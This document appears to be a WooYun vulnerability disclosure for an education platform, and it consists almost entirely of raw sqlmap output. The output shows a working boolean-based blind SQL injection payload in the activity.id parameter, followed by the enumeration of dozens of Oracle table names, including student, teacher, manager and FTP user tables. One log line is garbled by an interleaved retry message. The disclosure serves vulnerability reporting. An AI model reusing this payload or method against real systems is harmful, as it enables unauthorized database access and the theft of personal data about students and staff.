WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: activity.id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: activity.id=202' AND 6464=6464 AND 'bLzg'='bLzg
---
[16:03:16] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
盲注一枚
current schema (equivalent to database on Oracle): 'SWPX'
[16:03:16] [INFO] retrieved: 126
[16:03:23] [INFO] retrieved: ACTIVITION_INFO
[16:03:53] [INFO] retrieved: ACTIVITION_SCORE
[16:04:08] [INFO] retrieved: ACTIVITION_STUDENT
[16:04:34] [INFO] retrieved: COURSEWARE_DIR
[16:05:07] [INFO] retrieved: COURSEWARE_INFO
[16:05:20] [INFO] retrieved: COURSEWARE_TEMPLATE
[16:05:41] [INFO] retrieved: ENTITY_COURSE_ACTIVE
[16:06:22] [INFO] retrieved: ENTITY_COURSE_COURSEWARE
[16:06:49] [INFO] retrieved: ENTITY_COURSE_INFO
[16:07:04] [INFO] retrieved: ENTITY_COURSE_ITEM
[16:07:16] [INFO] retrieved: ENTITY_ELECTIVE
[16:07:39] [INFO] retrieved: ENTITY_MANAGER_INFO
[16:08:06] [INFO] retrieved: ENTITY_NOTE_INFO
[16:08:33] [INFO] retrieved: ENTITY_REGISTER_INFO
[16:09:03] [INFO] retrieved: ENTITY_RESOURCE_INFO
[16:09:30] [INFO] retrieved: ENTITY_RESOURCE_SEMESTER
[16:09:52] [INFO] retrieved: ENTITY_SEMESTER_INFO
[16:10:26] [INFO] retrieved: ENTITY_STUDENT_INFO
[16:11:07] [INFO] retrieved: ENTITY_TEACHER_COURSE
[16:11:43] [INFO] retrieved: ENTITY_TEACHER_INFO
[16:12:00] [INFO] retrieved: ENTITY_TEACH_CLASS
[16:12:17] [INFO] retrieved: FRIEND_LINK
[16:12:44] [INFO] retrieved: FTP_USER
[16:13:05] [INFO] retrieved: INFO_MANAGER_INFO
[16:13:45] [INFO] retrieved: INFO_NEWS
[16:13:56] [INFO] retrieved: INFO_NEWS_TYPE
[16:14:10] [INFO] retrieved: INFO_USER_RIGHT
[16:14:33] [INFO] retrieved: INTERACTION_ANNOUNCE_INFO
[16:15:24] [INFO] retrieved: INTERACTION_ANSWER_INFO
[16:15:50] [INFO] retrieved: INTERACTION_ELITEANSWER_INFO
[16:16:35] [INFO] retrieved: INTERACTION_ELITEQUESTION_INFO
[16:17:12] [INFO] retrieved: INTERACTION_FORUM
[16:17:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
ing to retry the request
LIST_INFO
[16:18:13] [INFO] retrieved: INTERACTION_FORUM_ELITE_DIR
[16:18:50] [INFO] retrieved: INTERACTION_FORUM_INFO
[16:19:08] [INFO] retrieved: INTERACTION_HOMEWORK_CHECK
[16:19:40] [INFO] retrieved: INTERACTION_HOMEWORK_INFO
[16:19:55] [INFO] retrieved: INTERACTION_INHOMEWORK_CHECK
[16:20:32] [INFO] retrieved: INTERACTION_INHOMEWORK_INFO
[16:20:52] [INFO] retrieved: INTERACTION_QUESTION_ELITEDIR
[16:21:47] [INFO] retrieved: INTERACTION_QUESTION_INFO
[16:22:05] [INFO] retrieved: INTERACTION_TEACHCLASS_INFO
[16:22:40] [INFO] retrieved: LEAVEWORD_INFO
[16:23:16] [INFO] retrieved: LEAVEWORD_REPLY
[16:23:34] [INFO] retrieved: MAIL_INFO
[16:23:55] [INFO] retrieved: ONLINEEXAM_COURSE_INFO
[16:24:48] [INFO] retrieved: ONLINEEXAM_COURSE_PAPER
[16:25:04] [INFO] retrieved: ONLINETEST_COURSE_INFO
[16:25:43] [INFO] retrieved: ONLINETEST_COURSE_PAPER
[16:26:02] [INFO] retrieved: PAPER_SELECTIVE
[16:26:36] [INFO] retrieved: PAPER_SUBJECT_INFO
[16:27:08] [INFO] retrieved: PLAN_TABLE
你懂的